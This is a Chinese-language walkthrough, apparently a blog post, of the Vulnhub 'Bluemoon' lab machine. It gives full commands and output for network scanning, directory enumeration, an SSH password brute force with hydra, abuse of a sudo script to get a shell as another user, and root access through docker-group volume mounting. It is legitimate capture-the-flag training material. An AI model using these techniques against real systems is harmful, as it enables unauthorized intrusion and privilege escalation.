首页 > 其他分享 >Vulnhub Bluemoon靶机解题详细过程

Vulnhub Bluemoon靶机解题详细过程

时间:2022-11-15 11:47:23浏览次数:46  
标签:56.117 Bluemoon kali jerry 192.168 Vulnhub 靶机 txt robin

Bluemoon

识别目标主机IP地址

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ sudo netdiscover -i eth
Currently scanning: 192.168.92.0/16   |   Screen View: Unique Hosts                                                                          
                                                                                                                                              
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                             
 192.168.56.100  08:00:27:fd:b9:2d      1      60  PCS Systemtechnik GmbH                                                                     
 192.168.56.117  08:00:27:14:4c:68      1      60  PCS Systemtechnik GmbH    1

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.117

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.117 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-14 21:46 EST
Nmap scan report for bogon (192.168.56.117)
Host is up (0.00032s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 2c:e2:63:78:bc:55:fe:f3:cb:09:a9:d8:26:2f:cb:d5 (RSA)
|   256 c4:c8:6b:48:92:25:a5:f7:00:9f:ab:b2:56:d5:ed:dc (ECDSA)
|_  256 a9:5b:39:a1:6e:05:91:0f:75:3c:88:0b:55:7c:a8:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: BlueMoon:2021
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:14:4C:68 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.61 seconds

目标主机有3个开放端口21(ftp服务)、22(ssh服务)以及80(http服务)

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ searchsploit vsftpd 3.0.3                                  
------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                               |  Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service                                                                      | multiple/remote/49719.py
------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ftp 192.168.56.117        
Connected to 192.168.56.117.
220 (vsFTPd 3.0.3)
Name (192.168.56.117:kali): anonymous
530 Permission denied.
ftp: Login failed
ftp> quit
221 Goodbye.

FTP服务vsftpd没有可以利用的漏洞,不允许匿名访问。

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ steghide extract -sf .blue.jpg 
Enter passphrase
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ stegseek .blue.jpg /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.91% (133.3 MB)           
[!] error: Could not find a valid passphrase.
: 

下载到Kali Linux本地的图片似乎有密码,但是破解失败。

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ curl http://192.168.56.117/robots.txt                                                                     
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.117 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ gobuster dir -u http://192.168.56.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.117
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/14 22:03:52 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
/hidden_text          (Status: 200) [Size: 1169]
Progress: 219133 / 220561 (99.35%)===============================================================
2022/11/14 22:04:35 Finished
===============================================================
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ curl http://192.168.56.117/hidden_text
<!doctype html>
<html>
<head>
    <title>Undergoing Work</title>
    <link rel="icon" href=".blue.jpg" type="image/icon type">
    <meta charset="utf-8" />
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <style type="text/css">
    body {
        background-color: #f0f0f2;
        margin: 0;
        padding: 0;
        font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
        
    }
    div {
        width: 600px;
        margin: 5em auto;
        padding: 2em;
        background-color: #fdfdff;
        border-radius: 0.5em;
        box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
    }
    a:link, a:visited {
        color: #38488f;
        text-decoration: none;
    }
    @media (max-width: 700px) {
        div {
            margin: 0 auto;
            width: auto;
        }
    }
    </style>    
</head>

<body>
<div>
    <h1>Maintanance!</h1>
    <p>Sorry For Delay. We Will Recover Soon. </p>
    <p><a href=".QR_C0d3.png">Thank You ...</a></p>
</div>
</body>
</html>

目标扫描所发现的/hidden_text目录,通过浏览器访问该目录,返回页面包含一个隐藏的图片,为二维码图片,扫描得到以下信息:

#!/bin/bash HOST=ip USER=userftp PASSWORD=ftpp@ssword ftp -inv $HOST user $USER $PASSWORD bye EOF

这应该是FTP的用户名和密码,尝试以下:

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ftp 192.168.56.117
Connected to 192.168.56.117.
220 (vsFTPd 3.0.3)
Name (192.168.56.117:kali): userftp
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||61671|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             147 Mar 07  2021 information.txt
-rw-r--r--    1 0        0             363 Mar 07  2021 p_lists.txt
226 Directory send OK.
ftp> get information.txt
local: information.txt remote: information.txt
229 Entering Extended Passive Mode (|||35007|)
150 Opening BINARY mode data connection for information.txt (147 bytes).
100% |**************************************************************************************************|   147      163.68 KiB/s    00:00 ETA
226 Transfer complete.
147 bytes received in 00:00 (77.89 KiB/s)
ftp> get p_lists.txt
local: p_lists.txt remote: p_lists.txt
229 Entering Extended Passive Mode (|||61257|)
150 Opening BINARY mode data connection for p_lists.txt (363 bytes).
100% |**************************************************************************************************|   363        3.14 KiB/s    00:00 ETA
226 Transfer complete.
363 bytes received in 00:00 (3.12 KiB/s)
ftp> ls -alh
229 Entering Extended Passive Mode (|||22391|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Mar 07  2021 .
drwxr-xr-x    3 1001     1001         4096 Mar 07  2021 ..
-rw-r--r--    1 0        0             147 Mar 07  2021 information.txt
-rw-r--r--    1 0        0             363 Mar 07  2021 p_lists.txt
226 Directory send OK.
ftp> quit
221 Goodbye.

查看以下从FTP服务器中下载到Kali Linux本地的文件是什么内容:

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ls     
information.txt  nmap_full_scan  p_lists.txt
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ cat information.txt                   

Hello robin ...!
    
    I'm Already Told You About Your Password Weekness. I will give a Password list. you May Choose Anyone of The Password.

                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ cat p_lists.txt    
h4ck3rp455wd
4dm1n
Pr0h4ck3r
5cr1ptk1dd3
pubgpr0pl4yer
H34d5h00t3r
p@ssw0rd
@@d1dn0tf1nd
J4ck_5p4rr0w
c4pt10n_jack
D0veC4m3r0n
f1nnb4l0r
r0manr3ing5
s3thr0lin5
Demonk1ng
R4ndy0rton
Big_sh0w
j0hnc3na
5tr0ngp@ssw0rd
S4br1n4
4nnlyn
C4rp3nt3r
K0fiKing5t0n
chNAMPIN
Herr0lins
G0palT0p3r
Log3shDriv3r
k4rv3ndh4nh4ck3r
P0nmuGunth0n
Shank3rD3v
KishorMilkV4n
S4th15hR4cer

这里提示用户名是robin,而p_list文件可以作为字典,接下来用hydra来破解一i啊

┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ hydra -l robin -P p_lists.txt 192.168.56.117 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-14 22:12:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 32 login tries (l:1/p:32), ~2 tries per task
[DATA] attacking ssh://192.168.56.117:22/
[22][ssh] host: 192.168.56.117   login: robin   password: k4rv3ndh4nh4ck3r
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-14 22:12:16
                                                                                    
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ssh [email protected]                           
The authenticity of host '192.168.56.117 (192.168.56.117)' can't be established.
ED25519 key fingerprint is SHA256:C+Z/8na2o0LXAqk7WswSnNQya1ZPegq4CyO9DR+VXTw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.117' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux BlueMoon 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr  4 07:43:48 2021 from 192.168.43.44
robin@BlueMoon:~$ id
uid=1000(robin) gid=1000(robin) groups=1000(robin),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
robin@BlueMoon:~$ 

成功得到用户robin的shell

robin@BlueMoon:~$ sudo -l
Matching Defaults entries for robin on bluemoon:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User robin may run the following commands on bluemoon:
    (jerry) NOPASSWD: /home/robin/project/feedback.sh

发现robin可以不用密码以jerry身份执行feedback.sh脚本,看是不是可以直接拿到jerry的shell

Script For FeedBack

Enter Your Name : jason

Enter You FeedBack About This Target Machine : /bin/bash

id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry),114(docker)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
jerry@BlueMoon:/home/robin$ cd /home
jerry@BlueMoon:/home$ ls
jerry  robin  userftp
jerry@BlueMoon:/home$ cd jerry
jerry@BlueMoon:~$ ls -alh
total 32K
drwxr-xr-x 3 jerry jerry 4.0K Apr  4  2021 .
drwxr-xr-x 5 root  root  4.0K Mar  8  2021 ..
-rw------- 1 jerry jerry   16 Nov 14 19:16 .bash_history
-rw-r--r-- 1 jerry jerry  220 Apr 17  2019 .bash_logout
-rw-r--r-- 1 jerry jerry 3.5K Apr 17  2019 .bashrc
drwxr-xr-x 3 jerry jerry 4.0K Mar  8  2021 .local
-rw-r--r-- 1 jerry jerry  807 Apr 17  2019 .profile
-rw-r----- 1 jerry jerry  178 Mar  8  2021 user2.txt
jerry@BlueMoon:~$ cat user2.txt

You Found User-2 Flag
      
       ==> Fl4g{Y0ur34ch3du53r25uc355ful1y}

You Are Reached Near To Me... Try To Find
                     
                               - Root

jerry@BlueMoon:~$ cd .local

提权

jerry@BlueMoon:~/.local$ id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry),114(docker)

用户jerry是docker组成员,而docker 有root权限,所以开始挂载

jerry@BlueMoon:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
alpine              latest              28f6e2705743        21 months ago       5.61MB
jerry@BlueMoon:~$ docker run -v /root:/mnt -it -alpine
invalid argument "lpine" for "-a, --attach" flag: valid streams are STDIN, STDOUT and STDERR
See 'docker run --help'.
jerry@BlueMoon:~$ docker run -v /root:/mnt -it alpine
/ # ls
bin    etc    lib    mnt    proc   run    srv    tmp    var
dev    home   media  opt    root   sbin   sys    usr
/ # cd /root
~ # cd /mnt
/mnt # ls
root.txt
/mnt # cat root.txt

==> Congratulations <==

You Reached Root...!

Root-Flag 
    
     Fl4g{r00t-H4ckTh3P14n3t0nc34g41n}

Created By 
       
        Kirthik - Karvendhan
                    
 
instagram = ____kirthik____



!......Bye See You Again......!

/mnt # 

成功拿到root flag!!!

标签:56.117,Bluemoon,kali,jerry,192.168,Vulnhub,靶机,txt,robin
From: https://www.cnblogs.com/jason-huawen/p/16891903.html

相关文章

  • Vulnhub Blogger靶机解题过程
    Blogger识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Blogger]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.103.0/16|ScreenView:Unique......
  • Vulnhub 02 Breakout靶机解题详细过程
    02Breakout识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/02_breakout]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.74.0/16|ScreenView:Uni......
  • vulnhub靶场之Beelzebub
    准备:攻击机:虚拟机kali、本机win10。靶机:Beelzebub:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/beelzebub/Beelzebub.zip......
  • Vulnhub Bluesky靶机解题详细过程
    Bluesky识别目标主机IP地址该靶机存在无法从VirtualBox自动获取IP的问题,解决过程见本人另文,此处不再赘述。┌──(kali㉿kali)-[~/Vulnhub/Bluesky]└─$sudonetdisc......
  • Vulnhub Victim 01靶机解题过程
    Victim01识别目标主机IP地址......
  • vulnhub靶场之DRIPPING BLUES: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DRIPPINGBLUES:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/drippingblues/drip......
  • Vulnhub Sundown靶机解题过程
    Sundown识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/Sundown]└─$sudonetdiscover-ieth13CapturedARPReq/Reppackets,from3hosts.Totalsize:180......
  • Vulnhub So Simple 1靶机解题过程
    SoSimple1识别目标主机IP地址┌──(kali㉿kali)-[~]└─$sudonetdiscover-ieth1......
  • Vulnhub ReconForce靶机解题详细过程
    ReconForce识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/ReconForce]└─$sudonetdiscover-ieth13CapturedARPReq/Reppackets,from3hosts.Totalsize:......
  • vulnhub靶场之DOUBLETROUBLE: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DOUBLETROUBLE:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/doubletrouble/doubl......